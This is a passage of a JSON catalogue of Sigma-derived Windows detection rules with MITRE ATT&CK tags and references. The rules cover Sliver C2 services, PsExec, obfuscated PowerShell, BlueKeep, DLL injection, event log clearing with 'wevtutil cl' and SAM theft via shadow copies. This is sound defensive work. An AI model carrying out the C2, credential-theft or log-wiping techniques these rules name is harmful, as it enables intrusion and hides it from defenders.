"attack.command-and-control", "attack.t1219" ] }, "related": [ { "dest-uuid": "4061e78c-1284-44b4-9116-73e4ac3912f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4bb79b62-ef12-4861-981d-2aab43fab642", "value": "TacticalRMM Service Installation" }, { "description": "Detects a PDQDeploy service installation which indicates that PDQDeploy 
was installed on the machines.\nPDQDeploy can be abused by attackers to remotely install packages or execute commands on target machines\n", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-07-22", "falsepositive": [ "Legitimate use of the tool" ], "filename": "win_system_service_install_pdqdeploy.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://documentation.pdq.com/PDQDeploy/13.0.3.0/index.html?windows-services.htm", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_pdqdeploy.yml" ], "tags": [ "attack.privilege-escalation", "attack.t1543.003" ] }, "related": [ { "dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "ee9ca27c-9bd7-4cee-9b01-6e906be7cae3", "value": "New PDQDeploy Service - Server Side" }, { "description": "Detects known malicious service installations that appear when Sliver implants execute the PsExec command (default service names used by the framework)", "meta": { "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-08-25", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sliver.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.microsoft.com/security/blog/2022/08/24/looking-for-the-sliver-lining-hunting-for-emerging-command-and-control-frameworks/", "https://github.com/BishopFox/sliver/blob/79f2d48fcdfc2bee4713b78d431ea4b27f733f30/client/command/commands.go#L1231", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sliver.yml" ], "tags": [ "attack.execution", "attack.privilege-escalation", "attack.t1543.003", "attack.t1569.002" ] }, "related": [ { 
"dest-uuid": "2959d63f-73fd-46a1-abd2-109d7dcede32", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", "value": "Sliver C2 Default Service Installation" }, { "description": "Detects Obfuscated use of stdin to execute PowerShell", "meta": { "author": "Jonathan Cheong, oscd.community", "creation_date": "2020-10-15", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_stdin_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_stdin_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "72862bf2-0eb1-11eb-adc1-0242ac120002", "value": "Invoke-Obfuscation STDIN+ Launcher - System" }, { "description": "Detects PsExec service installation and execution events", "meta": { "author": "Thomas Patzke", "creation_date": "2017-06-12", "falsepositive": [ "Unknown" ], "filename": "win_system_service_install_sysinternals_psexec.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://jpcertcc.github.io/ToolAnalysisResultSheet", "https://www.jpcert.or.jp/english/pub/sr/ir_research.html", 
"https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_service_install_sysinternals_psexec.yml" ], "tags": [ "attack.execution", "attack.t1569.002", "attack.s0029" ] }, "related": [ { "dest-uuid": "f1951e8a-500e-4a26-8803-76d95c4554b4", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "42c575ea-e41e-41f1-b248-8093c3e82a28", "value": "PsExec Service Installation" }, { "description": "Detects obfuscated PowerShell launched via Clip.exe in scripts, as produced by the Invoke-Obfuscation Use Clip launcher", "meta": { "author": "Nikita Nazarov, oscd.community", "creation_date": "2020-10-09", "falsepositive": [ "Unknown" ], "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/SigmaHQ/sigma/issues/1009", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/service_control_manager/win_system_invoke_obfuscation_via_use_clip_services.yml" ], "tags": [ "attack.defense-evasion", "attack.t1027", "attack.execution", "attack.t1059.001" ] }, "related": [ { "dest-uuid": "b3d682b6-98f2-4fb0-aa3b-b4df007ca70a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "970a3432-3237-47ad-bcca-7d8cbb217736", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "63e3365d-4824-42d8-8b82-e56810fefa0c", "value": "Invoke-Obfuscation Via Use Clip - System" }, { "description": "Detects the exploitation of an NTFS vulnerability, reported in January 2021 via Twitter without many details, in which accessing a specially crafted path corrupts the volume", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2021-01-11", "falsepositive": [ "Unlikely" ], "filename": "win_system_ntfs_vuln_exploit.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://www.bleepingcomputer.com/news/security/windows-10-bug-corrupts-your-hard-drive-on-seeing-this-files-icon/", "https://twitter.com/jonasLyk/status/1347900440000811010", "https://twitter.com/wdormann/status/1347958161609809921", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/ntfs/win_system_ntfs_vuln_exploit.yml" ], "tags": [ "attack.impact", "attack.t1499.001" ] }, "related": [ { "dest-uuid": "0df05477-c572-4ed6-88a9-47c581f548f7", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f14719ce-d3ab-4e25-9ce6-2899092260b0", "value": "NTFS Vulnerability Exploitation" }, { "description": "Detects an application popup reporting a failure of the Sysmon service, which may indicate an attempt to crash or disable the sensor (defense evasion)", "meta": { "author": "Tim Shelton", "creation_date": "2022-04-26", "falsepositive": [ "Unknown" ], "filename": "win_system_application_sysmon_crash.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/f1b010ce0ee1b71e3024180de1a3e67f99701fe4/ETWProvidersManifests/Windows10/1803/W10_1803_Pro_19700101_17134.1/WEPExplorer/Application%20Popup.xml#L36", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/application_popup/win_system_application_sysmon_crash.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562" ] }, "related": [ { "dest-uuid": "3d333250-30e4-4a82-9edc-756c68afc529", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "4d7f1827-1637-4def-8d8a-fd254f9454df", "value": "Sysmon Application Crashed" }, { "description": "Detects suspicious errors on the RDP protocol (TermDD) that may indicate exploitation attempts of CVE-2019-0708 (BlueKeep); network interruptions can produce the same errors, so correlate with other indicators", "meta": { "author": "Lionel PRAT, Christophe BROCAS, @atc_project (improvements)", "creation_date": "2019-05-24", "falsepositive": [ "Bad connections or network interruptions" ], "filename": "win_system_rdp_potential_cve_2019_0708.yml", 
"level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/Ekultek/BlueKeep", "https://web.archive.org/web/20190710034152/https://github.com/zerosum0x0/CVE-2019-0708", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/termdd/win_system_rdp_potential_cve_2019_0708.yml" ], "tags": [ "attack.lateral-movement", "attack.t1210", "car.2013-07-002" ] }, "related": [ { "dest-uuid": "9db0cf3a-a3c9-4012-8268-123b9db6fd82", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "aaa5b30d-f418-420b-83a0-299cb6024885", "value": "Potential RDP Exploit CVE-2019-0708" }, { "description": "This rule detects a DHCP server in which a specified Callout DLL (in registry) was loaded", "meta": { "author": "Dimitrios Slamaris", "creation_date": "2017-05-15", "falsepositive": [ "Unknown" ], "filename": "win_system_susp_dhcp_config.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "13fc89a9-971e-4ca6-b9dc-aa53a445bf40", "value": "DHCP Server Loaded the CallOut DLL" }, { "description": "This rule detects a DHCP server error in which a specified Callout DLL (in registry) could not be loaded", "meta": { "author": "Dimitrios Slamaris, @atc_project (fix)", "creation_date": "2017-05-15", 
"falsepositive": [ "Unknown" ], "filename": "win_system_susp_dhcp_config_failed.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://msdn.microsoft.com/de-de/library/windows/desktop/aa363389(v=vs.85).aspx", "https://technet.microsoft.com/en-us/library/cc726884(v=ws.10).aspx", "https://blog.3or.de/mimilib-dhcp-server-callout-dll-injection.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_dhcp_server/win_system_susp_dhcp_config_failed.yml" ], "tags": [ "attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "75edd3fd-7146-48e5-9848-3013d7f0282c", "value": "DHCP Server Error Failed Loading the CallOut DLL" }, { "description": "Detects volume shadow copy mount via Windows event log", "meta": { "author": "Roberto Rodriguez @Cyb3rWard0g, Open Threat Research (OTR)", "creation_date": "2020-10-20", "falsepositive": [ "Legitimate use of volume shadow copy mounts (backups maybe)." 
], "filename": "win_system_volume_shadow_copy_mount.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1003.002/T1003.002.md#atomic-test-3---esentutlexe-sam-copy", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_ntfs/win_system_volume_shadow_copy_mount.yml" ], "tags": [ "attack.credential-access", "attack.t1003.002" ] }, "related": [ { "dest-uuid": "1644e709-12d2-41e5-a60f-3470991f5011", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "f512acbf-e662-4903-843e-97ce4652b740", "value": "Volume Shadow Copy Mount" }, { "description": "Detects the exploitation of a security bypass and elevation of privilege vulnerability with Authentication Negotiation by using weak RC4-HMAC negotiation", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-11-09", "falsepositive": [ "Unknown" ], "filename": "win_system_kdcsvc_rc4_downgrade.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/kb5021131-how-to-manage-the-kerberos-protocol-changes-related-to-cve-2022-37966-fd837ac3-cdec-4e76-a6ec-86e67501407d", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_rc4_downgrade.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "e6f81941-b1cd-4766-87db-9fc156f658ee", "value": "KDC RC4-HMAC Downgrade CVE-2022-37966" }, { "description": "Detects a user certificate that was valid but could not be mapped to a user in a strong way (such as via explicit mapping, key trust mapping, or a SID)\nThis could be a sign of exploitation of the elevation of privilege vulnerabilities (CVE-2022-34691, 
CVE-2022-26931, CVE-2022-26923) that can occur when the KDC allows certificate spoofing by not requiring a strong mapping.\nEvents where the AccountName and CN of the Subject do not match, or where the CN ends in a dollar sign indicating a machine, may indicate certificate spoofing.\n", "meta": { "author": "@br4dy5", "creation_date": "2023-10-09", "falsepositive": [ "If prevalent in the environment, filter on events where the AccountName and CN of the Subject do not reference the same user", "If prevalent in the environment, filter on CNs that end in a dollar sign indicating it is a machine name" ], "filename": "win_system_kdcsvc_cert_use_no_strong_mapping.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://support.microsoft.com/en-us/topic/kb5014754-certificate-based-authentication-changes-on-windows-domain-controllers-ad2c23b0-15d8-4340-a468-4d4f3b188f16", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_cert_use_no_strong_mapping.yml" ], "tags": [ "attack.privilege-escalation" ] }, "uuid": "993c2665-e6ef-40e3-a62a-e1a97686af79", "value": "Certificate Use With No Strong Mapping" }, { "description": "Detects errors when a target server doesn't have suitable keys for generating kerberos tickets.\nThis issue can occur for example when a service uses a user account or a computer account that is configured for only DES encryption on a computer that is running Windows 7 which has DES encryption for Kerberos authentication disabled.\n", "meta": { "author": "@SerkinValery", "creation_date": "2024-03-07", "falsepositive": [ "Unknown" ], "filename": "win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ 
"https://learn.microsoft.com/en-us/previous-versions/windows/it-pro/windows-server-2008-r2-and-2008/dd348773(v=ws.10)", "https://learn.microsoft.com/en-us/troubleshoot/windows-server/windows-security/kdc-event-16-27-des-encryption-disabled", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_kerberos_key_distribution_center/win_system_kdcsvc_tgs_no_suitable_encryption_key_found.yml" ], "tags": [ "attack.credential-access", "attack.t1558.003" ] }, "related": [ { "dest-uuid": "f2877f7f-9a4c-4251-879f-1224e3006bee", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "b1e0b3f5-b62e-41be-886a-daffde446ad4", "value": "No Suitable Encryption Key Found For Generating Kerberos Ticket" }, { "description": "Detects the invocation of TabTip via CLSID as seen when JuicyPotatoNG is used on a system in brute force mode", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022-10-07", "falsepositive": [ "Unknown" ], "filename": "win_system_lpe_indicators_tabtip.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/antonioCoco/JuicyPotatoNG", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_distributed_com/win_system_lpe_indicators_tabtip.yml" ], "tags": [ "attack.execution", "attack.t1557.001" ] }, "related": [ { "dest-uuid": "650c784b-7504-4df7-ab2c-4ea882384d1e", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "bc2e25ed-b92b-4daa-b074-b502bdd1982b", "value": "Local Privilege Escalation Indicator TabTip" }, { "description": "One of the Windows Eventlogs has been cleared. e.g. 
caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-01-10", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_system_eventlog_cleared.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_eventlog_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", "value": "Eventlog Cleared" }, { "description": "Detects the clearing of one of the Windows Core Eventlogs. e.g. 
caused by \"wevtutil cl\" command execution", "meta": { "author": "Florian Roth (Nextron Systems), Tim Shelton, Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2022-05-17", "falsepositive": [ "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", "System provisioning (system reset before the golden image creation)" ], "filename": "win_system_susp_eventlog_cleared.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://twitter.com/deviouspolack/status/832535435960209408", "https://www.hybrid-analysis.com/sample/027cc450ef5f8c5f653329641ec1fed91f694e0d229928963b30f6b0d7d3a745?environmentId=100", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/system/microsoft_windows_eventlog/win_system_susp_eventlog_cleared.yml" ], "tags": [ "attack.defense-evasion", "attack.t1070.001", "car.2016-04-002" ] }, "related": [ { "dest-uuid": "6495ae23-3ab4-43c5-a94f-5638a2c31fd2", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "100ef69e-3327-481c-8e5c-6d80d9507556", "value": "Important Windows Eventlog Cleared" }, { "description": "Detects a DNS server error in which a specified plugin DLL (in registry) could not be loaded", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2017-05-08", "falsepositive": [ "Unknown" ], "filename": "win_dns_server_susp_server_level_plugin_dll.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://technet.microsoft.com/en-us/library/cc735829(v=ws.10).aspx", "https://twitter.com/gentilkiwi/status/861641945944391680", "https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_susp_server_level_plugin_dll.yml" ], "tags": [ 
"attack.defense-evasion", "attack.t1574.002" ] }, "related": [ { "dest-uuid": "e64c62cf-9cd7-4a14-94ec-cdaac43ab44b", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "cbe51394-cd93-4473-b555-edf0144952d9", "value": "DNS Server Error Failed Loading the ServerLevelPluginDLL" }, { "description": "Detects when a DNS zone transfer failed.", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-24", "falsepositive": [ "Unlikely" ], "filename": "win_dns_server_failed_dns_zone_transfer.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://kb.eventtracker.com/evtpass/evtpages/EventId_6004_Microsoft-Windows-DNS-Server-Service_65410.asp", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/dns_server/win_dns_server_failed_dns_zone_transfer.yml" ], "tags": [ "attack.reconnaissance", "attack.t1590.002" ] }, "related": [ { "dest-uuid": "0ff59227-8aa8-4c09-bf1f-925605bd07ea", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "6d444368-6da1-43fe-b2fc-44202430480e", "value": "Failed DNS Zone Transfer" }, { "description": "Detects execution of AppX packages with known suspicious or malicious signature", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Unknown" ], "filename": "win_appxpackaging_om_sups_appx_signature.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://www.sentinelone.com/labs/inside-malicious-windows-apps-for-malware-deployment/", "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appxpackaging_om/win_appxpackaging_om_sups_appx_signature.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "b5aa7d60-c17e-4538-97de-09029d6cd76b", "value": "Suspicious 
Digital Signature Of AppX Package" }, { "description": "Detects execution of Sysinternals tools via an AppX package. Attackers could install the Sysinternals Suite to get access to tools such as psexec and procdump to avoid detection based on System paths", "meta": { "author": "Nasreddine Bencherchali (Nextron Systems)", "creation_date": "2023-01-16", "falsepositive": [ "Legitimate usage of the applications from the Windows Store" ], "filename": "win_appmodel_runtime_sysinternals_tools_appx_execution.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "Internal Research", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/appmodel_runtime/win_appmodel_runtime_sysinternals_tools_appx_execution.yml" ], "tags": [ "attack.defense-evasion", "attack.execution" ] }, "uuid": "d29a20b2-be4b-4827-81f2-3d8a59eab5fc", "value": "Sysinternals Tools AppX Versions Execution" }, { "description": "Detects scenarios where an attacker enables the OpenSSH server and the server starts listening on the SSH socket.", "meta": { "author": "mdecrevoisier", "creation_date": "2022-10-25", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_sshd_openssh_server_listening_on_socket.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://medium.com/threatpunter/detecting-adversary-tradecraft-with-image-load-event-logging-and-eql-8de93338c16", "https://virtualizationreview.com/articles/2020/05/21/ssh-server-on-windows-10.aspx", "https://learn.microsoft.com/en-us/windows-server/administration/openssh/openssh_install_firstuse", "https://github.com/mdecrevoisier/EVTX-to-MITRE-Attack/tree/master/TA0008-Lateral%20Movement/T1021.004-Remote%20Service%20SSH", "https://winaero.com/enable-openssh-server-windows-10/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/openssh/win_sshd_openssh_server_listening_on_socket.yml" ], 
"tags": [ "attack.lateral-movement", "attack.t1021.004" ] }, "related": [ { "dest-uuid": "2db31dcd-54da-405d-acef-b9129b816ed6", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "3ce8e9a4-bc61-4c9b-8e69-d7e2492a8781", "value": "OpenSSH Server Listening On Socket" }, { "description": "Detects the addition of a new module to an IIS server.", "meta": { "author": "frack113", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_module_added.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview", "https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_module_added.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "dd857d3e-0c6e-457b-9b48-e82ae7f86bd7", "value": "New Module Module Added To IIS Server" }, { "description": "Detects changes to the IIS server configuration in order to disable/remove the ETW logging/processing option.", "meta": { "author": "frack113, Nasreddine Bencherchali", "creation_date": "2024-10-06", 
"falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_logging_etw_disabled.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/configuration/system.applicationhost/sites/sitedefaults/logfile/", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_logging_etw_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "a5b40a90-baf5-4bf7-a6f7-373494881d22", "value": "ETW Logging/Processing Option Disabled On IIS Server" }, { "description": "Detects the removal of a previously installed IIS module.", "meta": { "author": "Nasreddine Bencherchali", "creation_date": "2024-10-06", "falsepositive": [ "Legitimate administrator activity" ], "filename": "win_iis_module_removed.yml", "level": "low", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/get-started/introduction-to-iis/iis-modules-overview", "https://www.microsoft.com/en-us/security/blog/2022/07/26/malicious-iis-extensions-quietly-open-persistent-backdoors-into-servers/", 
"https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_module_removed.yml" ], "tags": [ "attack.defense-evasion", "attack.persistence", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], "uuid": "9e1a1fdf-ee58-40ce-8e15-b66ca5a80e1f", "value": "Previously Installed IIS Module Was Removed" }, { "description": "Detects changes to the IIS server configuration in order to disable HTTP logging for successful requests.", "meta": { "author": "frack113", "creation_date": "2024-10-06", "falsepositive": [ "Unknown" ], "filename": "win_iis_logging_http_disabled.yml", "level": "high", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://learn.microsoft.com/en-us/iis/manage/provisioning-and-managing-iis/configure-logging-in-iis", "https://learn.microsoft.com/en-us/iis/configuration/system.webserver/httplogging", "https://www.microsoft.com/en-us/security/blog/2022/12/12/iis-modules-the-evolution-of-web-shells-and-how-to-detect-them/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/iis-configuration/win_iis_logging_http_disabled.yml" ], "tags": [ "attack.defense-evasion", "attack.t1562.002", "attack.t1505.004" ] }, "related": [ { "dest-uuid": "4eb28bed-d11a-4641-9863-c2ac017d910a", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" }, { "dest-uuid": "b46a801b-fd98-491c-a25a-bca25d6e3001", "tags": [ "estimative-language:likelihood-probability=\"almost-certain\"" ], "type": "related-to" } ], 
"uuid": "e8ebd53a-30c2-45bd-81bb-74befba07bdb", "value": "HTTP Logging Disabled On IIS Server" }, { "description": "Detects logins by standard users that are part of high privileged groups such as the Administrator group", "meta": { "author": "frack113", "creation_date": "2023-01-13", "falsepositive": [ "Standard domain users who are part of the administrator group. These users shouldn't have these rights, but where it is necessary they should be filtered out using the \"TargetUserName\" field" ], "filename": "win_lsa_server_normal_user_admin.yml", "level": "medium", "logsource.category": "No established category", "logsource.product": "windows", "refs": [ "https://github.com/nasbench/EVTX-ETW-Resources/blob/7a806a148b3d9d381193d4a80356016e6e8b1ee8/ETWProvidersManifests/Windows11/22H2/W11_22H2_Pro_20221220_22621.963/WEPExplorer/LsaSrv.xml", "https://learn.microsoft.com/en-us/windows-server/security/credentials-protection-and-management/configuring-additional-lsa-protection", "https://learn.microsoft.com/en-us/windows-server/identity/ad-ds/manage/understand-security-identifiers", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/builtin/lsa_server/win_lsa_server_normal_user_admin.yml" ], "tags": [ "attack.credential-access", "attack.privilege-escalation" ] }, "uuid": "7ac407cc-0f48-4328-aede-de1d2e6fef41", "value": "Standard User In High Privileged Group" }, { "description": "Detects when an application acquires a certificate private key", "meta": { "author": "Zach Mathis", "creation_date": "2023-05-13", "falsepositive": [ "Legitimate application requesting certificate exports will trigger this. 
